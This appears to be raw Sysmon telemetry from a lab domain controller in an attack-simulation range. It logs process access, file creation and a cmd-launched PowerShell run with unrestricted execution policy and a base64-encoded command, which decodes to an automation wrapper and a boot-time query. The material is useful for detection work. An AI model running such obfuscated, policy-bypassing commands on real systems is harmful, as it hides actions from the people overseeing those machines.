JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 11241100x8000000000000000581Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:01.107{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.cmdline2021-03-31 12:00:01.107 11241100x8000000000000000580Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localDLL2021-03-31 12:00:01.107{266CAFBE-6440-6064-D902-00000000AD01}3712C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\sdvgceyb.dll2021-03-31 12:00:01.107 10341000x8000000000000000845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.982{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.967{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.967{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.967{266CAFBE-62DA-6064-0B00-00000000AD01}856584C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-6442-6064-E702-00000000AD01}43244776C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-6442-6064-E802-00000000AD01}39004464C:\Windows\system32\cmd.exe{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.955{266CAFBE-6442-6064-E902-00000000AD01}4516C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6442-6064-7EBF-120000000000}0x12bf7e0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x8000000000000000828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.951{266CAFBE-6442-6064-E702-00000000AD01}43244776C:\Windows\system32\conhost.exe{266CAFBE-6442-6064-E802-00000000AD01}3900C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:02.935{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 